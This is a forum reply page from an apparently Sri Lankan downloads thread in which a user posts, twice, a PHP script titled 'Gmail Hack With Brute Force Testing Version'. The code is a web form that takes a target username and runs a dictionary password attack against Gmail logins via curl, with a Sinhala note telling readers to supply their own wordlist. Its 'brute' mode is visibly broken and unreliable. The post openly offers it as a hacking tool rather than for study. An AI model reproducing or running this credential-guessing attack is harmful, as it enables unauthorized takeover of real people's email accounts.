Search
Search titles only
By:
Search titles only
By:
Log in
Register
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Forums
New posts
All threads
Latest threads
New posts
Trending threads
Trending
Search forums
What's new
New posts
New ads
New profile posts
Latest activity
Free Ads
Latest reviews
Search ads
Members
Current visitors
New profile posts
Search profile posts
Contact us
Latest ads
Handmade Character Soft Toys
anil1961
Updated:
Today at 2:11 PM
Bodim.lk out now !
Manoj Suranga Bandara
Updated:
Sunday at 3:05 AM
Power Lifting Lever Belt
SkullVamp
Updated:
Jun 13, 2026
Ad icon
port.lk Domain for sale
Lankan-Tech
Updated:
Jun 13, 2026
Colombo
Kaduwela - Two Storey House for Sale
dilrasan
Updated:
Jun 11, 2026
Electronics
Vehicles
Property
Search
Reply to thread
Forums
Computers & Internet
Downloads
Maxa SOFTware COLLECTION FRM HIRUSHAN
Get the App
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Message
<blockquote data-quote="hirushan" data-source="post: 3434415" data-attributes="member: 31863"><p><strong>Gmail Hack With Brute Force Testing Version</strong></p><p></p><p>[PHP]<?php</p><p></p><p>//////////////////////</p><p>////Gmail-Brute//////</p><p>///////////////////////</p><p></p><p></p><p></p><p></p><p>////////////////////////</p><p># This script was created to Brute Force G-Mail Logins,#</p><p>#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #</p><p>////////////////////////</p><p></p><p>$dic ="your Dictionary file here.txt";</p><p></p><p>///////////////////////</p><p></p><p></p><p></p><p>echo "</p><p><title>Gmail Brute Force Attacker</title></p><p></head></p><p><style type='text/css'></p><p>body {</p><p></p><p></p><p>font:Verdana, Arial, Helvetica, sans-serif;</p><p>font-size:12px;</p><p>border-color:#FFFFFF;</p><p>}</p><p>.raster_table {</p><p>background-color:#444444;</p><p>border-color:#CCCCCC;</p><p>}</p><p>.alert {</p><p> color:#FF0000;</p><p>}</p><p></style></p><p><body></p><p><table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'></p><p><tr></p><p><td></p><p><div align='center'><b>Gmail Brute Force Attacker</b></div></p><p> </td></p><p> </tr></p><p></table></p><p><table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'></p><p> <tr></p><p> <td></p><p> <div align='center'></p><p></p><p> </div></p><p> </td></p><p> </tr></p><p> <tr></p><p> <td></p><p> <div align='center'></p><p> </p><p> </div></p><p> </td></p><p> </tr></p><p> <tr></p><p> <td></p><p> <div align='center'></p><p> <form method='post'></p><p> Username to brute:<br></p><p> <input name='username' type='text' /><br><br></p><p> <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br></p><p> </form></p><p> </div></p><p> </td></p><p> </tr></p><p> <tr></p><p> <td></p><p> <div align='center'></p><p> </p><p> </div></p><p> </td></p><p> </tr></p><p></table></p><p>";</p><p></p><p>// Sets variables and retrives google error for comparing</p><p>if(isset($_POST['attack']) && isset($_POST['username'])) {</p><p> $username = $_POST['username'];</p><p> $headers = array(</p><p> "Host: mail.google.com",</p><p> "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",</p><p> "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",</p><p> "Accept-Language: en-us,en;q=0.5",</p><p> "Accept-Encoding: text", # No gzip, it only clutters your code!</p><p> "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",</p><p> "Date: ".date(DATE_RFC822)</p><p> );</p><p> $c = curl_init('https://mail.google.com/mail/feed/atom');</p><p> curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication</p><p> curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers</p><p> curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!</p><p> curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow</p><p> curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);</p><p> curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);</p><p> curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised</p><p> $wrong = curl_exec($c); // Get it</p><p> curl_close($c); // Close the curl stream</p><p>}</p><p></p><p>//Dictionary Attack</p><p>if($_POST['attack'] == "dictionary") {</p><p> $Dictionary = file("$dic");</p><p> for ($Position = 0; $Position < count($Dictionary); $Position++) {</p><p> $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);</p><p> if(check_correct($username, $Dictionary[$Position])) {</p><p> die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'></p><p> <tr></p><p> <td></p><p> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div></p><p> </td></p><p> </tr></p><p></table></p><p></body></p><p></html>");</p><p> }</p><p> }</p><p> echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'></p><p> <tr></p><p> <td></p><p> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar</p><p>y attack.</b></div></p><p> </td></p><p> </tr></p><p></table>";</p><p>}</p><p></p><p>//Brute Attack</p><p>elseif($_POST['attack'] == "brute") {</p><p> for ($Pass = 0; $Pass < 2; $Pass++) {</p><p> if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }</p><p> if(check_correct($username, $Pass)) {</p><p> die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'></p><p> <tr></p><p> <td></p><p> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div></p><p> </td></p><p> </tr></p><p></table></p><p></body></p><p></html>");</p><p> }</p><p> }</p><p> echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'></p><p> <tr></p><p> <td></p><p> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for</p><p>ce attack.</b></div></p><p> </td></p><p> </tr></p><p></table>";</p><p>}</p><p>echo "</body></p><p></html>";</p><p></p><p>// Function for checking whether the username and password are correct</p><p>function check_correct($username, $password)</p><p>{</p><p> global $wrong, $headers;</p><p> $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');</p><p> curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication</p><p> curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers</p><p> curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!</p><p> curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow</p><p> curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);</p><p> curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);</p><p> curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised</p><p> $str = curl_exec($c); // Get it</p><p> curl_close($c);</p><p> if($str != $wrong) {return true;}</p><p> else {return false;}</p><p>}</p><p></p><p></p><p>?>[/PHP]</p><p></p><p></p><p></p><p>your Dictionary file here.txt kiyana tanata Ogollange txt file eka daala check karala balanna...........mama tama meka testing......hariyai.....matath yaluwek dunne.........</p></blockquote><p></p>
[QUOTE="hirushan, post: 3434415, member: 31863"] [b]Gmail Hack With Brute Force Testing Version[/b] [PHP]<?php ////////////////////// ////Gmail-Brute////// /////////////////////// //////////////////////// # This script was created to Brute Force G-Mail Logins,# #it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) # //////////////////////// $dic ="your Dictionary file here.txt"; /////////////////////// echo " <title>Gmail Brute Force Attacker</title> </head> <style type='text/css'> body { font:Verdana, Arial, Helvetica, sans-serif; font-size:12px; border-color:#FFFFFF; } .raster_table { background-color:#444444; border-color:#CCCCCC; } .alert { color:#FF0000; } </style> <body> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Gmail Brute Force Attacker</b></div> </td> </tr> </table> <table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> <form method='post'> Username to brute:<br> <input name='username' type='text' /><br><br> <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br> </form> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> </table> "; // Sets variables and retrives google error for comparing if(isset($_POST['attack']) && isset($_POST['username'])) { $username = $_POST['username']; $headers = array( "Host: mail.google.com", "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language: en-us,en;q=0.5", "Accept-Encoding: text", # No gzip, it only clutters your code! "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $wrong = curl_exec($c); // Get it curl_close($c); // Close the curl stream } //Dictionary Attack if($_POST['attack'] == "dictionary") { $Dictionary = file("$dic"); for ($Position = 0; $Position < count($Dictionary); $Position++) { $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]); if(check_correct($username, $Dictionary[$Position])) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionar y attack.</b></div> </td> </tr> </table>"; } //Brute Attack elseif($_POST['attack'] == "brute") { for ($Pass = 0; $Pass < 2; $Pass++) { if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } if(check_correct($username, $Pass)) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr> </table> </body> </html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute for ce attack.</b></div> </td> </tr> </table>"; } echo "</body> </html>"; // Function for checking whether the username and password are correct function check_correct($username, $password) { global $wrong, $headers; $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $str = curl_exec($c); // Get it curl_close($c); if($str != $wrong) {return true;} else {return false;} } ?>[/PHP] your Dictionary file here.txt kiyana tanata Ogollange txt file eka daala check karala balanna...........mama tama meka testing......hariyai.....matath yaluwek dunne......... [/QUOTE]
Insert quotes…
Verification
Hath warak paha keeyada? (hatha wadikireema paha)
Post reply
Top
Bottom